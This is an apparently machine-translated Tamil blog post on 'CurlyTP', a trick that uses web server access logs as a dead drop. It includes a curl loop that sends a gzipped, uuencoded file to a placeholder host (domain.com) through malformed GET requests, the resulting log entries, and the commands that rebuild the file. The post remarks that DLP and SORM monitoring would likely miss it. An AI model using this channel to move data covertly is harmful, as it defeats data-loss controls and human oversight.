புரோஹோஸ்டர் > Блог > நிர்வாகம் > சர்வர் பதிவுகள் மூலம் ரகசிய செய்திகளை பரிமாறிக்கொள்வது

சர்வர் பதிவுகள் மூலம் ரகசிய செய்திகளை பரிமாறிக்கொள்வது

விக்கிபீடியா வரையறையின்படி, டெட் ட்ராப் என்பது ஒரு சதி கருவியாகும், இது ஒரு ரகசிய இருப்பிடத்தைப் பயன்படுத்தும் நபர்களிடையே தகவல் அல்லது சில பொருட்களை பரிமாறிக்கொள்ள உதவுகிறது. மக்கள் ஒருபோதும் சந்திப்பதில்லை என்பது இதன் கருத்து - ஆனால் செயல்பாட்டு பாதுகாப்பைப் பராமரிக்க அவர்கள் இன்னும் தகவல்களைப் பரிமாறிக்கொள்கிறார்கள்.

மறைவான இடம் கவனத்தை ஈர்க்கக்கூடாது. எனவே, ஆஃப்லைன் உலகில் அவர்கள் பெரும்பாலும் விவேகமான விஷயங்களைப் பயன்படுத்துகிறார்கள்: சுவரில் ஒரு தளர்வான செங்கல், ஒரு நூலக புத்தகம் அல்லது ஒரு மரத்தில் ஒரு வெற்று.

இணையத்தில் பல குறியாக்க மற்றும் அநாமதேய கருவிகள் உள்ளன, ஆனால் இந்த கருவிகளைப் பயன்படுத்துவதன் உண்மை கவனத்தை ஈர்க்கிறது. கூடுதலாக, அவை கார்ப்பரேட் அல்லது அரசாங்க மட்டத்தில் தடுக்கப்படலாம். என்ன செய்ய?

டெவலப்பர் ரியான் ஃப்ளவர்ஸ் ஒரு சுவாரஸ்யமான விருப்பத்தை முன்மொழிந்தார் - எந்த இணைய சேவையகத்தையும் மறைவிடமாக பயன்படுத்தவும். நீங்கள் இதைப் பற்றி யோசித்தால், ஒரு வலை சேவையகம் என்ன செய்கிறது? கோரிக்கைகளைப் பெறுகிறது, கோப்புகளை வெளியிடுகிறது மற்றும் பதிவுகளை எழுதுகிறது. மேலும் இது அனைத்து கோரிக்கைகளையும் பதிவு செய்கிறது, தவறானவை கூட!

எந்தவொரு வலை சேவையகமும் பதிவில் எந்த செய்தியையும் சேமிக்க உங்களை அனுமதிக்கிறது என்று மாறிவிடும். இதை எப்படி பயன்படுத்துவது என்று மலர்கள் யோசித்தன.

அவர் இந்த விருப்பத்தை வழங்குகிறார்:

  1. ஒரு உரை கோப்பை (ரகசிய செய்தி) எடுத்து ஹாஷை (md5sum) கணக்கிடுங்கள்.
  2. நாங்கள் அதை குறியாக்கம் செய்கிறோம் (gzip+uuencode).
  3. சேவையகத்திற்கு வேண்டுமென்றே தவறான கோரிக்கையைப் பயன்படுத்தி பதிவிற்கு எழுதுகிறோம்.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

கோப்பைப் படிக்க, நீங்கள் இந்த செயல்பாடுகளை தலைகீழ் வரிசையில் செய்ய வேண்டும்: கோப்பை டிகோட் செய்து அன்சிப் செய்து, ஹாஷை சரிபார்க்கவும் (ஹாஷ் திறந்த சேனல்களில் பாதுகாப்பாக அனுப்பப்படலாம்).

இடங்கள் மாற்றப்படுகின்றன =+=அதனால் முகவரியில் இடங்கள் இருக்காது. ஆசிரியர் CurlyTP என்று அழைக்கும் நிரல், மின்னஞ்சல் இணைப்புகள் போன்ற அடிப்படை64 குறியாக்கத்தைப் பயன்படுத்துகிறது. கோரிக்கை ஒரு முக்கிய சொல்லுடன் செய்யப்படுகிறது ?transfer?அதனால் பெறுநர் அதை எளிதாக பதிவுகளில் கண்டுபிடிக்க முடியும்.

இந்த வழக்கில் பதிவுகளில் நாம் என்ன பார்க்கிறோம்?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

ஏற்கனவே குறிப்பிட்டுள்ளபடி, ஒரு ரகசிய செய்தியைப் பெற, நீங்கள் தலைகீழ் வரிசையில் செயல்பாடுகளைச் செய்ய வேண்டும்:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

செயல்முறை தானியங்கு எளிதானது. Md5sum பொருந்துகிறது, மேலும் கோப்பின் உள்ளடக்கங்கள் அனைத்தும் சரியாக டிகோட் செய்யப்பட்டன என்பதை உறுதிப்படுத்துகின்றன.

முறை மிகவும் எளிமையானது. "இந்தப் பயிற்சியின் நோக்கம் அப்பாவி சிறிய வலை கோரிக்கைகள் மூலம் கோப்புகளை மாற்ற முடியும் என்பதை நிரூபிப்பதாகும், மேலும் இது எளிய உரை பதிவுகளுடன் எந்த இணைய சேவையகத்திலும் வேலை செய்கிறது. அடிப்படையில், ஒவ்வொரு வலை சேவையகமும் ஒரு மறைவிடமாகும்! ”என்று எழுதுகிறார் மலர்கள்.

நிச்சயமாக, பெறுநருக்கு சேவையக பதிவுகளுக்கான அணுகல் இருந்தால் மட்டுமே இந்த முறை செயல்படும். ஆனால் அத்தகைய அணுகல் வழங்கப்படுகிறது, எடுத்துக்காட்டாக, பல ஹோஸ்டர்கள்.

அதை எப்படி பயன்படுத்துவது?

ரியான் ஃப்ளவர்ஸ், தான் ஒரு தகவல் பாதுகாப்பு நிபுணர் அல்ல என்றும், கர்லிடிபிக்கான சாத்தியமான பயன்பாடுகளின் பட்டியலைத் தொகுக்கப் போவதில்லை என்றும் கூறுகிறார். அவரைப் பொறுத்தவரை, நாம் அன்றாடம் பார்க்கும் பழக்கமான கருவிகள் வழக்கத்திற்கு மாறான முறையில் பயன்படுத்தப்படலாம் என்ற கருத்துக்கு இது ஒரு சான்று.

உண்மையில், இந்த முறை மற்ற சேவையக "மறைகள்" போன்றவற்றை விட பல நன்மைகளைக் கொண்டுள்ளது டிஜிட்டல் டெட் டிராப் அல்லது பைரேட்பாக்ஸ்: இதற்கு சர்வர் பக்கத்தில் சிறப்பு உள்ளமைவு அல்லது சிறப்பு நெறிமுறைகள் தேவையில்லை - மேலும் போக்குவரத்தை கண்காணிப்பவர்களிடையே சந்தேகத்தை ஏற்படுத்தாது. ஒரு SORM அல்லது DLP அமைப்பு சுருக்கப்பட்ட உரை கோப்புகளுக்கான URLகளை ஸ்கேன் செய்யும் என்பது சாத்தியமில்லை.

சேவை கோப்புகள் மூலம் செய்திகளை அனுப்பும் வழிகளில் இதுவும் ஒன்றாகும். சில மேம்பட்ட நிறுவனங்கள் எவ்வாறு வைக்கப்படுகின்றன என்பதை நீங்கள் நினைவில் கொள்ளலாம் HTTP தலைப்புகளில் டெவலப்பர் வேலைகள் அல்லது HTML பக்கங்களின் குறியீட்டில்.

சர்வர் பதிவுகள் மூலம் ரகசிய செய்திகளை பரிமாறிக்கொள்வது

ஒரு சாதாரண நபர் தலைப்புகள் அல்லது HTML குறியீட்டைப் பார்க்க மாட்டார் என்பதால், இணைய உருவாக்குநர்கள் மட்டுமே இந்த ஈஸ்டர் முட்டையைப் பார்ப்பார்கள் என்பது யோசனை.

சர்வர் பதிவுகள் மூலம் ரகசிய செய்திகளை பரிமாறிக்கொள்வது

ஆதாரம்: www.habr.com

கருத்தைச் சேர்